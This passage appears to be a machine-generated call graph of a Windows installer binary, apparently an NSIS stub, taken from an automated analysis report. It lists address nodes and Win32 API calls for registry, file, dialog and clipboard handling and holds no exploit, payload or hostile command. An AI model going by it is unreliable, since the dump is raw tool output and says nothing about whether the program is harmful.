4459->4456 4460->4461 4462 401541 RegDeleteKeyW 4460->4462 4461->4446 4462->4461 4463 4040e4 4464 4040ff 4463->4464 4470 40422d 4463->4470 4466 40413a 4464->4466 4494 403ff6 WideCharToMultiByte 4464->4494 4465 404298 4467 40436a 4465->4467 4468 4042a2 GetDlgItem 4465->4468 4474 403d6b 19 API calls 4466->4474 4475 403df6 8 API calls 4467->4475 4471 40432b 4468->4471 4472 4042bc 4468->4472 4470->4465 4470->4467 4473 404267 GetDlgItem SendMessageW 4470->4473 4471->4467 4476 40433d 4471->4476 4472->4471 4480 4042e2 6 API calls 4472->4480 4499 403db1 KiUserCallbackDispatcher 4473->4499 4478 40417a 4474->4478 4479 404365 4475->4479 4481 404353 4476->4481 4482 404343 SendMessageW 4476->4482 4484 403d6b 19 API calls 4478->4484 4480->4471 4481->4479 4485 404359 SendMessageW 4481->4485 4482->4481 4483 404293 4486 403d8d SendMessageW 4483->4486 4487 404187 CheckDlgButton 4484->4487 4485->4479 4486->4465 4497 403db1 KiUserCallbackDispatcher 4487->4497 4489 4041a5 GetDlgItem 4498 403dc4 SendMessageW 4489->4498 4491 4041bb SendMessageW 4492 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4491->4492 4493 4041d8 GetSysColor 4491->4493 4492->4479 4493->4492 4495 404033 4494->4495 4496 404015 GlobalAlloc WideCharToMultiByte 4494->4496 4495->4466 4496->4495 4497->4489 4498->4491 4499->4483 4500 402ae4 4501 402aeb 4500->4501 4502 4030e3 4500->4502 4503 402af2 CloseHandle 4501->4503 4503->4502 4504 402065 4505 401446 18 API calls 4504->4505 4506 40206d 4505->4506 4507 401446 18 API calls 4506->4507 4508 402076 GetDlgItem 4507->4508 4509 4030dc 4508->4509 4510 4030e3 4509->4510 4512 405f7d wsprintfW 4509->4512 4512->4510 4513 402665 4514 40145c 18 API calls 4513->4514 4515 40266b 4514->4515 4516 40145c 18 API calls 4515->4516 4517 402674 4516->4517 4518 40145c 18 API calls 4517->4518 4519 40267d 4518->4519 4520 4062cf 11 API calls 4519->4520 4521 40268c 4520->4521 4522 406301 2 API calls 4521->4522 4523 402695 4522->4523 4524 4026a6 lstrlenW lstrlenW 4523->4524 4526 404f9e 25 API calls 4523->4526 4528 4030e3 4523->4528 4525 404f9e 25 API calls 4524->4525 4527 4026e8 SHFileOperationW 4525->4527 4526->4523 4527->4523 4527->4528 4529 401c69 4530 40145c 18 API calls 4529->4530 4531 401c70 4530->4531 4532 4062cf 11 API calls 4531->4532 4533 401c80 4532->4533 4534 405ccc MessageBoxIndirectW 4533->4534 4535 401a13 4534->4535 4536 402f6e 4537 402f72 4536->4537 4538 402fae 4536->4538 4540 4062cf 11 API calls 4537->4540 4539 40145c 18 API calls 4538->4539 4546 402f9d 4539->4546 4541 402f7d 4540->4541 4542 4062cf 11 API calls 4541->4542 4543 402f90 4542->4543 4544 402fa2 4543->4544 4545 402f98 4543->4545 4548 406113 9 API calls 4544->4548 4547 403ea0 5 API calls 4545->4547 4547->4546 4548->4546 4549 4023f0 4550 402403 4549->4550 4551 4024da 4549->4551 4552 40145c 18 API calls 4550->4552 4553 404f9e 25 API calls 4551->4553 4554 40240a 4552->4554 4557 4024f1 4553->4557 4555 40145c 18 API calls 4554->4555 4556 402413 4555->4556 4558 402429 LoadLibraryExW 4556->4558 4559 40241b GetModuleHandleW 4556->4559 4560 4024ce 4558->4560 4561 40243e 4558->4561 4559->4558 4559->4561 4563 404f9e 25 API calls 4560->4563 4573 406391 GlobalAlloc WideCharToMultiByte 4561->4573 4563->4551 4564 402449 4565 40248c 4564->4565 4566 40244f 4564->4566 4567 404f9e 25 API calls 4565->4567 4568 401435 25 API calls 4566->4568 4571 40245f 4566->4571 4569 402496 4567->4569 4568->4571 4570 4062cf 11 API calls 4569->4570 4570->4571 4571->4557 4572 4024c0 FreeLibrary 4571->4572 4572->4557 4574 4063c9 GlobalFree 4573->4574 4575 4063bc GetProcAddress 4573->4575 4574->4564 4575->4574 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4576 4048f8 4577 404906 4576->4577 4578 40491d 4576->4578 4579 40490c 4577->4579 4594 404986 4577->4594 4580 40492b IsWindowVisible 4578->4580 4586 404942 4578->4586 4581 403ddb SendMessageW 4579->4581 4583 404938 4580->4583 4580->4594 4584 404916 4581->4584 4582 40498c CallWindowProcW 4582->4584 4595 40487a SendMessageW 4583->4595 4586->4582 4600 406035 lstrcpynW 4586->4600 4588 404971 4601 405f7d wsprintfW 4588->4601 4590 404978 4591 40141d 80 API calls 4590->4591 4592 40497f 4591->4592 4602 406035 lstrcpynW 4592->4602 4594->4582 4596 4048d7 SendMessageW 4595->4596 4597 40489d GetMessagePos ScreenToClient SendMessageW 4595->4597 4599 4048cf 4596->4599 4598 4048d4 4597->4598 4597->4599 4598->4596 4599->4586 4600->4588 4601->4590 4602->4594 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4603 4020f9 GetDC GetDeviceCaps 4604 401446 18 API calls 4603->4604 4605 402116 MulDiv 4604->4605 4606 401446 18 API calls 4605->4606 4607 40212c 4606->4607 4608 406831 18 API calls 4607->4608 4609 402165 CreateFontIndirectW 4608->4609 4610 4030dc 4609->4610 4611 4030e3 4610->4611 4613 405f7d wsprintfW 4610->4613 4613->4611 4614 4024fb 4615 40145c 18 API calls 4614->4615 4616 402502 4615->4616 4617 40145c 18 API calls 4616->4617 4618 40250c 4617->4618 4619 40145c 18 API calls 4618->4619 4620 402515 4619->4620 4621 40145c 18 API calls 4620->4621 4622 40251f 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402529 4623->4624 4625 40253d 4624->4625 4626 40145c 18 API calls 4624->4626 4627 4062cf 11 API calls 4625->4627 4626->4625 4628 40256a CoCreateInstance 4627->4628 4629 40258c 4628->4629 4630 4026fc 4632 402708 4630->4632 4633 401ee4 4630->4633 4631 406831 18 API calls 4631->4633 4633->4630 4633->4631 4634 4019fd 4635 40145c 18 API calls 4634->4635 4636 401a04 4635->4636 4637 405eab 2 API calls 4636->4637 4638 401a0b 4637->4638 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3782 401a1f 3783 40145c 18 API calls 3782->3783 3784 401a26 3783->3784 3785 4062cf 11 API calls 3784->3785 3786 401a49 3785->3786 3787 401a64 3786->3787 3788 401a5c 3786->3788 3857 406035 lstrcpynW 3787->3857 3856 406035 lstrcpynW 3788->3856 3791 401a6f 3858 40674e lstrlenW CharPrevW 3791->3858 3792 401a62 3795 406064 5 API calls 3792->3795 3826 401a81 3795->3826 3796 406301 2 API calls 3796->3826 3799 401a98 CompareFileTime 3799->3826 3800 401ba9 3801 404f9e 25 API calls 3800->3801 3803 401bb3 3801->3803 3802 401b5d 3804 404f9e 25 API calls 3802->3804 3835 40337f 3803->3835 3806 401b70 3804->3806 3810 4062cf 11 API calls 3806->3810 3808 406035 lstrcpynW 3808->3826 3809 4062cf 11 API calls 3811 401bda 3809->3811 3815 401b8b 3810->3815 3812 401be9 SetFileTime 3811->3812 3813 401bf8 CloseHandle 3811->3813 3812->3813 3813->3815 3816 401c09 3813->3816 3814 406831 18 API calls 3814->3826 3817 401c21 3816->3817 3818 401c0e 3816->3818 3819 406831 18 API calls 3817->3819 3820 406831 18 API calls 3818->3820 3821 401c29 3819->3821 3823 401c16 lstrcatW 3820->3823 3824 4062cf 11 API calls 3821->3824 3823->3821 3827 401c34 3824->3827 3825 401b50 3829 401b93 3825->3829 3830 401b53 3825->3830 3826->3796 3826->3799 3826->3800 3826->3802 3826->3808 3826->3814 3826->3825 3828 4062cf 11 API calls 3826->3828 3834 405e7c GetFileAttributesW CreateFileW 3826->3834 3861 405e5c GetFileAttributesW 3826->3861 3864 405ccc 3826->3864 3831 405ccc MessageBoxIndirectW 3827->3831 3828->3826 3832 4062cf 11 API calls 3829->3832 3833 4062cf 11 API calls 3830->3833 3831->3815 3832->3815 3833->3802 3834->3826 3836 40339a 3835->3836 3837 4033c7 3836->3837 3870 403368 SetFilePointer 3836->3870 3868 403336 ReadFile 3837->3868 3841 401bc6 3841->3809 3842 403546 3844 40354a 3842->3844 3845 40356e 3842->3845 3843 4033eb GetTickCount 3843->3841 3848 403438 3843->3848 3846 403336 ReadFile 3844->3846 3845->3841 3849 403336 ReadFile 3845->3849 3850 40358d WriteFile 3845->3850 3846->3841 3847 403336 ReadFile 3847->3848 3848->3841 3848->3847 3852 40348a GetTickCount 3848->3852 3853 4034af MulDiv wsprintfW 3848->3853 3855 4034f3 WriteFile 3848->3855 3849->3845 3850->3841 3851 4035a1 3850->3851 3851->3841 3851->3845 3852->3848 3854 404f9e 25 API calls 3853->3854 3854->3848 3855->3841 3855->3848 3856->3792 3857->3791 3859 401a75 lstrcatW 3858->3859 3860 40676b lstrcatW 3858->3860 3859->3792 3860->3859 3862 405e79 3861->3862 3863 405e6b SetFileAttributesW 3861->3863 3862->3826 3863->3862 3865 405ce1 3864->3865 3866 405d2f 3865->3866 3867 405cf7 MessageBoxIndirectW 3865->3867 3866->3826 3867->3866 3869 403357 3868->3869 3869->3841 3869->3842 3869->3843 3870->3837 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 